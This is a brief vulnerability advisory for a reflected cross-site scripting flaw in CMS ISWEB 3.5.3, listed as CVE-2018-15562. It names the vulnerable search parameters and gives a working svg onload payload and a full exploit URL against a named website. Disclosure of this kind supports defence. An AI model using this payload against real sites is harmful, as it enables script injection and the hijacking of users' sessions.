CMS ISWEB 3.5.3 XSS Reflected

CMS ISWEB 3.5.3 XSS Reflected

> CVE

CVE-2018-15562

> Parameter vuln:

ordineRis,
sezioneRicerca
oggettiRicerca

> Vendor of Product
CMS ISWEB 3.5.3 

> Attack Vectors
Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))>
URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>

> Discoverer
Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza